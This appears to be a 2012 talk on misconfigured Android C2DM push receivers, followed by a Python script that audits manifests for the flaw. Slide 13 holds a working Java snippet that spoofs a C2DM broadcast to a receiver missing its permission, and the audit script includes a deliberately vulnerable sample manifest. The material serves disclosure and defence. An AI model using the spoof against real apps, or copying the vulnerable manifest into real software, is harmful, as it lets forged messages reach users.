Talks about Google's Cloud to Device Messaging (C2DM, as it was called when this was written in 2012; now known as Google Cloud Messaging) technology, and ways it can be misconfigured.
2. Android C2DM Overview
• Push notification for Android
• Rides on Gtalk (XMPP)
• Messages limited to 1024 bytes
• Account limited to 200,000 messages per day
3. A confusing process
Image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm
7. Parts of a Message
Required
• Registration ID – sent by client
• Collapse key – used to avoid flooding
• Auth token – header from client login auth
Optional
• Data - payload
• Delay while idle - flag
12. Example Push (seen in logcat)
I/PushService( 3990): onHandleIntent:
action=3, intent data=Bundle[{
itm=37524594341,
push_action=3,
title=message received from: jross,
collapse_key=jrossig01,
sound=m2mmsghdr.caf,
evt=M2MMSGHDR,
from=appid@gmail.com,
usr=jross
}]
13. Spoof (no cloud required)
// declare the Intent
final Intent sendC2DM = new Intent("com.google.android.c2dm.intent.RECEIVE");
// set this as category com.app.mobile to match the intent-filter
sendC2DM.addCategory("com.app.mobile");
// add the expected data elements
sendC2DM.putExtra("itm", "37524594341");
sendC2DM.putExtra("push_action", "3");
sendC2DM.putExtra("title", "message received from: C2DSpoofer");
sendC2DM.putExtra("sound", "m2mmsghdr.caf");
sendC2DM.putExtra("evt", "M2MMSGHDR");
sendC2DM.putExtra("usr", send2usr);
String collapse_key = randString.genString(rng, chars, 4);
sendC2DM.putExtra("collapse_key", collapse_key);
// send the message to the on-device push notification receiver
sendBroadcast(sendC2DM);
14. What Happened?
• App received a “C2D” message from another application installed on the device.
• Because the permission wasn’t set correctly, it accepted the message as though it came from Google.
• App displayed message notification, with the “malicious” payload intact.
15. Other Things We’ve Noticed
• Messages that come in may not be accurately received by the activity they are sent to (see: demo).
• If you have multiple devices, or multiple users on a single device, things may get tricky.
registration_id = The registration ID retrieved from the Android application on the phone. Required.
collapse_key = An arbitrary string that is used to collapse a group of like messages when the device is offline, so that only the last message gets sent to the client. This is intended to avoid sending too many messages to the phone when it comes back online. Note that since there is no guarantee of the order in which messages get sent, the "last" message may not actually be the last message sent by the application server. Required.
data.<key> = Payload data, expressed as key-value pairs. If present, it will be included in the Intent as application data, with the <key>. There is no limit on the number of key/value pairs, though there is a limit on the total size of the message. Optional.
delay_while_idle = If included, indicates that the message should not be sent immediately if the device is idle. The server will wait for the device to become active, and then only the last message for each collapse_key value will be sent. Optional.
Authorization = GoogleLogin auth=[AUTH_TOKEN] Header with a ClientLogin Auth token. The cookie must be associated with the ac2dm service. Required.
This requires the application signature to be present when the permission is used.
This restricts the C2D messages such that they must be sourced from Google in order for the application to process them. If the “android:permission” attribute is missing, anyone can push messages of this type (registration results) to the application.
Same as #2, but for the actual C2D messages.
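The misconfiguration the slides describe (slides 13, 14 and the manifest notes above) comes down to a receiver for the C2DM intents that is missing android:permission="com.google.android.c2dm.permission.SEND", so any local app can sendBroadcast() a forged message to it. The following is an added example, not code from the original deck: a small Python audit that parses an AndroidManifest.xml and reports C2DM receivers lacking that permission, plus app-defined C2D_MESSAGE permissions that are not signature-protected. The two embedded manifests are constructed for the example; the package name com.app.mobile is taken from the intent category used in slide 13, and the class name .C2DMReceiver is an assumption.

```python
"""Audit an AndroidManifest.xml for misconfigured C2DM receivers.

Added example (not from the original slides). It uses only the standard
C2DM identifiers: the RECEIVE/REGISTRATION intent actions, the
com.google.android.c2dm.permission.SEND permission that limits who may
deliver to the receiver, and the app's own *.permission.C2D_MESSAGE
permission that should be protectionLevel="signature".
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
C2DM_ACTIONS = {
    "com.google.android.c2dm.intent.RECEIVE",
    "com.google.android.c2dm.intent.REGISTRATION",
}
C2DM_SEND_PERMISSION = "com.google.android.c2dm.permission.SEND"


def _attr(element, name):
    """Read an android:-namespaced attribute from an element."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def audit_manifest(manifest_xml):
    """Return a list of (element_name, detail, problem) findings.

    A receiver whose intent-filter accepts a C2DM action must declare
    android:permission="com.google.android.c2dm.permission.SEND"; without it
    any app on the device can broadcast a forged C2DM Intent to it (slide 13).
    """
    root = ET.fromstring(manifest_xml)
    findings = []

    # 1. App-defined C2D_MESSAGE permission must be signature-protected.
    for perm in root.iter("permission"):
        name = _attr(perm, "name") or "<unnamed>"
        if name.endswith(".permission.C2D_MESSAGE"):
            if _attr(perm, "protectionLevel") != "signature":
                findings.append((name, "permission", "protectionLevel is not signature"))

    # 2. Receivers for C2DM intents must require the SEND permission.
    for receiver in root.iter("receiver"):
        name = _attr(receiver, "name") or "<unnamed>"
        permission = _attr(receiver, "permission")
        for action in receiver.iter("action"):
            action_name = _attr(action, "name")
            if action_name not in C2DM_ACTIONS:
                continue
            if permission is None:
                findings.append((name, action_name, "missing android:permission"))
            elif permission != C2DM_SEND_PERMISSION:
                findings.append((name, action_name, "unexpected permission " + permission))
    return findings


# Constructed sample: the receiver accepts C2DM intents from anyone.
VULNERABLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.app.mobile">
  <permission android:name="com.app.mobile.permission.C2D_MESSAGE"
              android:protectionLevel="normal" />
  <uses-permission android:name="com.app.mobile.permission.C2D_MESSAGE" />
  <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" />
  <application>
    <receiver android:name=".C2DMReceiver">
      <intent-filter>
        <action android:name="com.google.android.c2dm.intent.RECEIVE" />
        <category android:name="com.app.mobile" />
      </intent-filter>
      <intent-filter>
        <action android:name="com.google.android.c2dm.intent.REGISTRATION" />
        <category android:name="com.app.mobile" />
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed sample: same app with the permission attributes in place.
HARDENED_MANIFEST = VULNERABLE_MANIFEST.replace(
    'android:protectionLevel="normal"', 'android:protectionLevel="signature"'
).replace(
    '<receiver android:name=".C2DMReceiver">',
    '<receiver android:name=".C2DMReceiver"\n'
    '              android:permission="com.google.android.c2dm.permission.SEND">',
)


if __name__ == "__main__":
    for label, manifest in (("vulnerable", VULNERABLE_MANIFEST), ("hardened", HARDENED_MANIFEST)):
        print(label, audit_manifest(manifest) or "OK")
```

Run against the vulnerable manifest the audit reports the non-signature C2D_MESSAGE permission and both C2DM actions on the unprotected receiver; the hardened manifest produces no findings. The check is deliberately static (manifest only) so it can run in CI before an APK is signed.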